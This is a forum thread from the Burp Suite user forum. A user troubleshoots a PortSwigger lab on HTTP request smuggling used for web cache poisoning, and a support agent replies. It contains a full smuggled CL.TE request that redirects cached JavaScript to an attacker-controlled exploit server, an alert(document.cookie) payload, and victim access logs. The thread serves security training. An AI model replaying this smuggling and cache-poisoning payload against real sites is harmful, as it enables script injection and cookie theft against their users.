Burp Suite User Forum

Create new post

Exploiting HTTP request smuggling to perform web cache poisoning - Failing to go to "Solved" status

Joshua | Last updated: Sep 27, 2024 03:44AM UTC

Here is my cache poisoning / Smuggled request POST / HTTP/1.1 Host: 0a16007d0305e2b380340869000b001a.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 185 Transfer-Encoding: chunked 0 GET /post/next?postId=3 HTTP/1.1 Host: exploit-0a190088031de26f8094071201cb00b9.exploit-server.net Content-Type: application/x-www-form-urlencoded Content-Length: 10 x=1 GET /resources/js/tracking.js HTTP/2 Host: 0a16007d0305e2b380340869000b001a.web-security-academy.net Connection: close My Exploit Server settings: File: /post Head: HTTP/1.1 200 OK Body: <script> alert(document.cookie) </script> I am Getting multiple hits from the victim in my logs, and on occasion, when I refresh the application site, I as well get re-directed to my exploit server and the alert executes. The logs: 10.0.3.226 2024-09-27 03:36:09 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 10.0.3.226 2024-09-27 03:36:17 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 75.1.242.172 2024-09-27 03:36:33 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36" 75.1.242.172 2024-09-27 03:36:49 +0000 "GET /log HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36" 75.1.242.172 2024-09-27 03:36:49 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36" 75.1.242.172 2024-09-27 03:37:12 +0000 "GET /log HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36" 75.1.242.172 2024-09-27 03:37:12 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36" 10.0.3.226 2024-09-27 03:37:25 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 10.0.3.226 2024-09-27 03:37:33 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 75.1.242.172 2024-09-27 03:37:45 +0000 "GET /log HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36" 75.1.242.172 2024-09-27 03:37:45 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36" 75.1.242.172 2024-09-27 03:37:59 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36" 10.0.3.226 2024-09-27 03:38:21 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 10.0.3.226 2024-09-27 03:38:28 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 10.0.3.226 2024-09-27 03:38:37 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 10.0.3.226 2024-09-27 03:38:43 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 10.0.3.226 2024-09-27 03:38:49 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 10.0.3.226 2024-09-27 03:38:55 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 10.0.3.226 2024-09-27 03:39:01 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 10.0.3.226 2024-09-27 03:39:06 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 10.0.3.226 2024-09-27 03:39:11 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" Clearly, this lab should be solving. But it is not.

Ben, PortSwigger Agent | Last updated: Sep 27, 2024 01:25PM UTC

Hi Joshua, If you try this across several different lab instances (so if you let the lab instance expire and relaunch the lab so that you obtain a lab with a different URL) does this behaviour persist?

Joshua | Last updated: Oct 01, 2024 01:18AM UTC

I just tried everything again. This behavior is persisting. I also modified the body payload, back to text/javascript, as outlined in the official solution, and I saw the same failure to go to solve status.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.